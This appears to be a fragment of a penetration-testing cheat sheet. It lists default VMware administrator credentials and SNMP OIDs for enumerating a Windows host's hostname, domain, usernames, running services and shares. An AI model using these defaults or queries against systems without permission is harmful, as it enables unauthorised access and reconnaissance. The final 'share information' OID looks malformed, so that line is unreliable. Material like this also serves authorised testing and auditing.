VMware vi-admin, root, hqadmin, vmware, admin vmware, vmw@re, hqadmin, default

SNMP OID values

OID Value
.1.3.6.1.2.1.1.5 Hostname
.1.3.6.1.4.1.77.4.2 Domain name
.1.3.6.1.4.1.77.1.2.25 Usernames
.1.3.6.1.4.1.77.1.2.3.1.1 Running services
.1.3.6.1.4.77.1.2.27 Share information